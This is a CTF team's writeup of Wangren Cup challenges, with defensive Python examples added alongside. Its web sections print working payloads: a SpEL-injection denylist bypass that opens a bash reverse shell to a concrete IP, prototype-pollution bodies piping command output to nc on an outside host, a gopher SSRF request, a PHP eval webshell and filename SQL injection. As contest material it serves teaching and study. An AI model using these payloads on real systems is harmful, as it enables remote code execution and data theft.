Wangren Cup (網刃杯) CTF: Selected Challenge Writeups
Statement
Author: WgpCTF
Word count: 16140
Reading time: 30 minutes
Attachments/links: click "View original" to download
This article is part of the Wolf Group Security Community (狼組安全社群) original content rewards program; reproduction without permission is prohibited.
Any direct or indirect consequences or losses arising from the dissemination or use of the information in this article are the sole responsibility of the user; the Wolf Group Security Team (狼組安全團隊) and the author accept no liability for them.
The Wolf Group Security Team reserves the right to modify and interpret this article. Anyone reproducing or distributing it must keep it intact, including the copyright statement and all other content. Without the team's permission the content may not be modified, added to or cut, nor used for commercial purposes in any way.
This post collects some of the challenge writeups from our CTF team's participation in the Wangren Cup CTF. Everyone is welcome to discuss and learn together!
1. WEB
ez_java
The source files can be downloaded. Fetch web.xml, which points to TestServlet.class; the servlet is mapped at test388.
/download?filename=../../../classes/com/abc/servlet/TestServlet.class
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//
package com.abc.servlet;

import java.io.IOException;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.springframework.expression.Expression;
import org.springframework.expression.ParserContext;
import org.springframework.expression.common.TemplateParserContext;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.StandardEvaluationContext;

public class TestServlet extends HttpServlet {
    public TestServlet() {
    }

    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        this.doPost(req, resp);
    }

    protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        try {
            String name = request.getParameter("name");
            name = new String(name.getBytes("ISO8859-1"), "UTF-8");
            // The denylist is matched against the raw parameter text only
            if (this.blackMatch(name)) {
                request.setAttribute("message", "name is invalid");
                request.getRequestDispatcher("/message.jsp").forward(request, response);
                return;
            }

            System.out.println(name);
            // The whole parameter is then evaluated as a SpEL template
            String message = this.getAdvanceValue(name);
            request.setAttribute("message", message);
            request.getRequestDispatcher("/message.jsp").forward(request, response);
        } catch (Exception var5) {
            request.setAttribute("message", "error");
            request.getRequestDispatcher("/message.jsp").forward(request, response);
        }
    }

    private boolean blackMatch(String val) {
        String[] var2 = this.getBlacklist();
        int var3 = var2.length;

        for(int var4 = 0; var4 < var3; ++var4) {
            String keyword = var2[var4];
            // 34 == Pattern.CASE_INSENSITIVE | Pattern.DOTALL
            Matcher matcher = Pattern.compile(keyword, 34).matcher(val);
            if (matcher.find()) {
                return true;
            }
        }

        return false;
    }

    private String getAdvanceValue(String val) {
        // TemplateParserContext: every #{...} block in the string is evaluated as an expression
        ParserContext parserContext = new TemplateParserContext();
        SpelExpressionParser parser = new SpelExpressionParser();
        Expression exp = parser.parseExpression(val, parserContext);
        // StandardEvaluationContext permits type references and reflective method calls
        StandardEvaluationContext evaluationContext = new StandardEvaluationContext();
        return exp.getValue(evaluationContext).toString();
    }

    private String[] getBlacklist() {
        return new String[]{"java.+lang", "Runtime", "exec.*\\("};
    }
}
Bypass the filter by splitting the blocked keywords across concatenated string literals:
#{''.getClass().forName('java.lan'+'g.Run'+'time').getMethod('exe'+'c',''.getClass()).invoke(''.getClass().forName('java.lan'+'g.Run'+'time').getMethod('getRun'+'time').invoke(null),'bash -c bash$IFS$9-i>&/dev/tcp/xxx.xxx.xxx.xxx/5555<&1')}
Catch the reverse shell on the VPS:
POST /test388?name=%23%7b%27%27%2e%67%65%74%43%6c%61%73%73%28%29%2e%66%6f%72%4e%61%6d%65%28%27%6a%61%76%61%2e%6c%61%6e%27%2b%27%67%2e%52%75%6e%27%2b%27%74%69%6d%65%27%29%2e%67%65%74%4d%65%74%68%6f%64%28%27%65%78%65%27%2b%27%63%27%2c%27%27%2e%67%65%74%43%6c%61%73%73%28%29%29%2e%69%6e%76%6f%6b%65%28%27%27%2e%67%65%74%43%6c%61%73%73%28%29%2e%66%6f%72%4e%61%6d%65%28%27%6a%61%76%61%2e%6c%61%6e%27%2b%27%67%2e%52%75%6e%27%2b%27%74%69%6d%65%27%29%2e%67%65%74%4d%65%74%68%6f%64%28%27%67%65%74%52%75%6e%27%2b%27%74%69%6d%65%27%29%2e%69%6e%76%6f%6b%65%28%6e%75%6c%6c%29%2c%27%62%61%73%68%20%2d%63%20%62%61%73%68%24%49%46%53%24%39%2d%69%3e%26%2f%64%65%76%2f%74%63%70%2f%38%32%2e%31%35%37%2e%31%36%31%2e%31%38%37%2f%35%35%35%35%3c%26%31%27%29%7d HTTP/1.1
Host: 124.220.9.19:8024
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
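The denylist in TestServlet runs its three regexes over the raw parameter text, so a keyword split across concatenated literals ('Run'+'time') never matches, and the template is then evaluated in a StandardEvaluationContext that allows reflective calls. The following Python script is an added example, not code from the challenge or from this writeup: it shows the detection-side lesson by folding adjacent single-quoted literals before matching, after which the same three keywords fire on a constructed expression shaped like the one above (the shell command is replaced with 'id'). The CONCAT_RE pattern, which ignores SpEL's escaped quotes (''), is a simplification assumed by this example.

```python
import re

# The servlet compiles each keyword with flags 34 == CASE_INSENSITIVE (2) | DOTALL (32).
BLACKLIST = [r"java.+lang", r"Runtime", r"exec.*\("]
FLAGS = re.IGNORECASE | re.DOTALL

# Two adjacent single-quoted SpEL string literals joined by '+'.
# Assumption/simplification: literals containing an escaped quote ('') are not handled.
CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")


def fold_string_concats(expr: str) -> str:
    """Collapse 'a'+'b'+'c' into 'abc' so a keyword split across literals reappears whole."""
    previous = None
    while previous != expr:
        previous = expr
        expr = CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", expr, count=1)
    return expr


def blacklist_hits(expr: str) -> list:
    """Keywords from the servlet's denylist that match the given text."""
    return [kw for kw in BLACKLIST if re.search(kw, expr, FLAGS)]


def check_expression(expr: str) -> dict:
    """Compare the naive check (what the servlet does) with a check on the folded form."""
    folded = fold_string_concats(expr)
    return {
        "raw_hits": blacklist_hits(expr),
        "folded_hits": blacklist_hits(folded),
        "folded": folded,
    }


# Constructed sample in the shape of the page's bypass, with the command replaced by 'id'.
SAMPLE = ("#{''.getClass().forName('java.lan'+'g.Run'+'time').getMethod('exe'+'c',''.getClass())"
          ".invoke(''.getClass().forName('java.lan'+'g.Run'+'time').getMethod('getRun'+'time')"
          ".invoke(null),'id')}")

if __name__ == "__main__":
    result = check_expression(SAMPLE)
    print("raw hits:   ", result["raw_hits"])      # []
    print("folded hits:", result["folded_hits"])   # all three keywords
```

Folding literals only closes one gap (T(...) type references, string-building via other operators and Unicode tricks remain). The durable fix on the application side is not to parse user input as a SpEL template at all, or at least to evaluate it with Spring's SimpleEvaluationContext, which does not expose type references or arbitrary method invocation the way StandardEvaluationContext does.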
SIGNIN
The service can read files.
None of the IPs near 172.73.25.21 run a web service.
Going through the ARP records turned up another web host.
POST parameters are delivered over the gopher protocol.
Plugged a ready-made gopher POST template straight in:
GET /?url=gopher://172.73.25.100:80/_POST%2520/%253Fa%253D1%2520HTTP/1.1%250D%250AHost%253A%2520172.73.25.100%250D%250AUser-Agent%253A%2520Mozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%253B%2520rv%253A87.0%2529%2520Gecko/20100101%2520Firefox/87.0%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AReferer%253A%2520bolean.club%250D%250AX-Forwarded-For%253A%2520127.0.0.1%250D%250AX-Originating-IP%253A%2520127.0.0.1%250D%250AX-Remote-IP%253A%2520127.0.0.1%250D%250AX-Remote-Addr%253A%2520127.0.0.1%250D%250AContent-Length%253A%25203%250D%250A%250D%250Ab%253D2%250D%250A HTTP/1.1
Host: 124.220.9.19:20002
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
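The SIGNIN request above works because the fetcher accepts any URL scheme, so gopher:// lets a raw HTTP POST be delivered to an internal host. Note that 172.73.25.0/24 lies outside the RFC 1918 ranges, so a denylist of "private" addresses would not have stopped this hop. The validator below is an added example, not code from the challenge or the writeup; the ALLOWED_HOSTS table and its hostnames are constructed. It allowlists scheme and destination instead of trying to enumerate bad ones.

```python
from urllib.parse import urlsplit

# Constructed allowlist (assumption): the only upstream host:port pairs the fetcher may contact.
ALLOWED_HOSTS = {"api.example.internal": {80, 443}}
ALLOWED_SCHEMES = {"http", "https"}


def validate_fetch_url(url: str, allowed_hosts=None) -> tuple:
    """Return (ok, reason). Rejects non-HTTP schemes (gopher://, file://, dict://, ...),
    embedded credentials, and any host:port that is not explicitly allowlisted."""
    allowed = ALLOWED_HOSTS if allowed_hosts is None else allowed_hosts
    try:
        parts = urlsplit(url)
    except ValueError as exc:
        return False, f"unparseable url: {exc}"
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {scheme or '<none>'}"
    host = (parts.hostname or "").lower()
    if not host:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in url"
    try:
        port = parts.port or (443 if scheme == "https" else 80)
    except ValueError:
        return False, "invalid port"
    if host not in allowed or port not in allowed[host]:
        return False, f"destination not allowlisted: {host}:{port}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed inputs; the first two mirror the shape of the request in the writeup.
    for candidate in ("gopher://172.73.25.100:80/_POST%20/%20HTTP/1.1",
                      "http://172.73.25.100/",
                      "https://api.example.internal/status"):
        print(candidate, "->", validate_fetch_url(candidate))
```

Resolving the allowlisted hostname and pinning the connection to the resolved address (so a DNS rebind cannot swap it later) belongs in the HTTP client layer and is not shown here.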
ezjs
http://124.222.24.150:10002/
Reference: http://www.kitsch.live/2021/03/14/nodejs%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/
Spaces are blocked, so ${IFS} is used instead:
POST / HTTP/1.1
Host: 124.222.173.163:10002
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: image/webp,*/*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://124.222.173.163:10002/
X-Forwarded-For: localhost
Content-Type: application/json
Content-Length: 149
{"__proto__":{"sourceURL":"\nglobal.process.mainModule.constructor._load('child_process')
.exec('ls${IFS}-al${IFS}|nc${IFS}152.136.230.235:8000')//"}}
The flag is at /.flag
A quick fuzz shows these are blocked: * = flag less cat tac tail nl
od is not blocked, and the keyword flag can be written as fla\\g
Dump the file as hexadecimal:
POST / HTTP/1.1
Host: 124.222.173.163:10002
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: image/webp,*/*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://124.222.173.163:10002/
X-Forwarded-For: localhost
Content-Type: application/json
Content-Length: 158
{"__proto__":{"sourceURL":"\nglobal.process.mainModule.constructor._load('child_process').
exec('od${IFS}-tx1${IFS}/.fla\\g|nc${IFS}152.136.230.235:8000')//"}}
Manually strip the offset column, create a new hex file in 010 Editor, and recover the flag.
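The ezjs bodies above reach child_process by sending a __proto__ key in the JSON, which a recursive merge then copies onto Object.prototype. The check below is an added Python example, not code from the writeup or the challenge: it is the body inspection one would run in a proxy or before any deep merge, parsing the JSON and reporting every key path that would land on the prototype. All sample bodies are constructed.

```python
import json


def find_polluting_keys(body: str) -> list:
    """Return dotted paths of keys in a JSON body that a naive recursive merge would
    write onto Object.prototype: '__proto__' anywhere, or 'prototype' directly
    under 'constructor'. Raises ValueError on malformed JSON."""
    paths = []

    def walk(node, path, parent_key):
        if isinstance(node, dict):
            for key, value in node.items():
                child = f"{path}.{key}" if path else key
                if key == "__proto__" or (key == "prototype" and parent_key == "constructor"):
                    paths.append(child)
                walk(value, child, key)
        elif isinstance(node, list):
            for index, item in enumerate(node):
                walk(item, f"{path}[{index}]", parent_key)

    walk(json.loads(body), "", None)
    return paths


def is_safe_body(body: str) -> bool:
    """Reject bodies that carry prototype-reaching keys or do not parse at all."""
    try:
        return not find_polluting_keys(body)
    except ValueError:  # malformed JSON: reject rather than guess
        return False


if __name__ == "__main__":
    # Constructed bodies: the first mirrors the shape of the page's payload with a harmless value.
    for sample in ('{"__proto__":{"sourceURL":"constructed"}}',
                   '{"user":{"constructor":{"prototype":{"isAdmin":true}}}}',
                   '{"name":"x","constructor":"Acme"}'):
        print(sample, "->", find_polluting_keys(sample))
```

A plain "constructor" value is left alone because it is a legitimate field name; only the constructor.prototype pair is flagged. On the application side the matching fix is a merge that skips these keys or builds targets with Object.create(null).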
upload
POST / HTTP/1.1
Host: 124.220.9.19:8002
Content-Length: 226
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://124.220.9.19:8002
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryD87uydBACUiWGZBm
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://124.220.9.19:8002/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundaryD87uydBACUiWGZBm
Content-Disposition: form-data; name="upfile"; filename="p7.php"
Content-Type: ctf
<?php @eval($_POST['pass']);echo "Hello world!"; ?>
------WebKitFormBoundaryD87uydBACUiWGZBm--
The page claims the upload is not parsed, but it clearly is, and what comes back is not the file itself either.
Presumably the rule check is done through a database query.
The filename is the injection point.
Guessed directly at a flag table with a flag column:
flag{5937a0b90b5966939cccd36929
Query the right-hand half:
}aa86c192963dccc9396695b09b0a73
flag{5937a0b90b5966939cccd369291c68aa}
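The upload section infers that the rule lookup is a database query with the browser-supplied filename inlined into it. The example below is added here and is my own code, not the challenge's; the upload_rules table is a constructed stand-in for whatever schema the challenge used. It puts the concatenated query next to a parameterized one guarded by an extension allowlist, and shows that a single quote in the filename breaks the first and is simply rejected by the second.

```python
import re
import sqlite3

# Only plain extensions are ever sent to the database (assumption of this example).
EXT_RE = re.compile(r"^[a-z0-9]{1,8}$")


def build_db() -> sqlite3.Connection:
    """Constructed in-memory rule table; the challenge's real schema is unknown."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE upload_rules (ext TEXT PRIMARY KEY, allowed INTEGER NOT NULL);"
        "INSERT INTO upload_rules VALUES ('jpg', 1), ('png', 1), ('php', 0);"
    )
    return conn


def extension_of(filename: str) -> str:
    """Extension as the client-supplied filename presents it, lower-cased, '' if none."""
    return filename.rsplit(".", 1)[1].lower() if "." in filename else ""


def is_allowed_vulnerable(conn, filename: str) -> bool:
    # Deliberately flawed, illustrating the writeup's hypothesis: the attacker-controlled
    # extension is pasted straight into the SQL text, so a quote changes the statement.
    ext = extension_of(filename)
    row = conn.execute(f"SELECT allowed FROM upload_rules WHERE ext = '{ext}'").fetchone()
    return bool(row and row[0])


def is_allowed_safe(conn, filename: str) -> bool:
    ext = extension_of(filename)
    if not EXT_RE.match(ext):  # anything that is not a plain extension never reaches SQL
        return False
    row = conn.execute("SELECT allowed FROM upload_rules WHERE ext = ?", (ext,)).fetchone()
    return bool(row and row[0])


def probe(conn, filename: str) -> dict:
    """Run both checks on one filename; record the exception type the vulnerable path raises."""
    try:
        vulnerable, error = is_allowed_vulnerable(conn, filename), None
    except sqlite3.Error as exc:
        vulnerable, error = None, type(exc).__name__
    return {"safe": is_allowed_safe(conn, filename), "vulnerable": vulnerable, "vulnerable_error": error}


if __name__ == "__main__":
    db = build_db()
    for name in ("photo.jpg", "shell.php", "x.jpg'"):   # constructed filenames
        print(name, "->", probe(db, name))
```

The database error on the quoted filename is exactly the signal that led the writeup to try the filename as an injection point; with the parameterized form there is no such signal because the value never becomes SQL syntax.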
2. MISC
xyp07
Comment inside the archive:
Vm0weGQxRXlTWGxVV0d4V1YwZFNVRlpyV25kWlZsSllZMFZrVmxKdVFsaFdNalZMWWtkS1IxTnFSbGhYU0VKNlZsWmFWMVpWTVVWaGVqQTk=
Decoding it gives
the archive password: Xyp77&7&77
Open the capture in Wireshark with the filter
cotp && cotp.type == 0x0f && s7comm.header.rosctr == 1 && s7comm.param.func == 0x05
Packet 1425 looks suspicious:
iPE=e>we,9:={]RnBjf<7_8Cw1b
Base91 decode:
welcome_S7_world_xyp07
flag{welcome_S7_world_xyp07}
3. REVERSE
freestyle
Computed to be 3327
Computed to be 105
flag{31a364d51abd0c8304106c16779d83b1}
4. ICS
easyice
Just search for the string flag.
carefulguy
Concatenated:
666c61677b7034757333313576337279316e7433726573746963397d
flag{p4us315v3ry1nt3restic9}
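Both the xyp07 archive comment (nested Base64) and the carefulguy hex string above are layered text encodings. The decoder below is an added Python example, not part of the writeup: it peels hex or Base64 layers while the result stays printable ASCII, using the two strings exactly as they appear on the page, and reproduces the archive password after seven Base64 layers and the ICS flag after one hex layer. Base91, which the packet payload uses, is not in the standard library and is not handled here.

```python
import base64
import binascii
import re
import string

# Values taken from the writeup above.
ZIP_COMMENT = "Vm0weGQxRXlTWGxVV0d4V1YwZFNVRlpyV25kWlZsSllZMFZrVmxKdVFsaFdNalZMWWtkS1IxTnFSbGhYU0VKNlZsWmFWMVpWTVVWaGVqQTk="
HEX_BLOB = "666c61677b7034757333313576337279316e7433726573746963397d"

HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
PRINTABLE = set(string.printable)


def decode_one_layer(text: str):
    """Try hex first (its alphabet is a subset of Base64's), then Base64.
    Returns (decoded_text, kind) when the result is printable ASCII, else None."""
    candidates = []
    if len(text) % 2 == 0 and HEX_RE.match(text):
        candidates.append(("hex", bytes.fromhex(text)))
    if len(text) % 4 == 0 and B64_RE.match(text):
        try:
            candidates.append(("base64", base64.b64decode(text, validate=True)))
        except binascii.Error:
            pass
    for kind, raw in candidates:
        try:
            decoded = raw.decode("ascii")
        except UnicodeDecodeError:
            continue
        if decoded and all(ch in PRINTABLE for ch in decoded):
            return decoded, kind
    return None


def peel(text: str, max_layers: int = 16) -> tuple:
    """Strip encoding layers until the text is no longer a clean hex/Base64 blob.
    Returns (final_text, list_of_layer_kinds). A plaintext that happens to look like
    Base64 would be decoded one step too far, which is why the layer list is returned:
    inspect it when the final text looks wrong."""
    current = text.strip()
    layers = []
    while len(layers) < max_layers:
        step = decode_one_layer(current)
        if step is None:
            break
        current, kind = step
        layers.append(kind)
    return current, layers


if __name__ == "__main__":
    print(peel(ZIP_COMMENT))   # ('Xyp77&7&77', ['base64', 'base64', 'base64', 'base64', 'base64', 'base64', 'base64'])
    print(peel(HEX_BLOB))      # ('flag{p4us315v3ry1nt3restic9}', ['hex'])
```

The stop condition is deliberately strict (exact padding, validate=True, printable output) so that the loop halts on the real plaintext rather than on a decoding accident; the password stops it because '&' is outside both alphabets, and the flag stops it because of '{'.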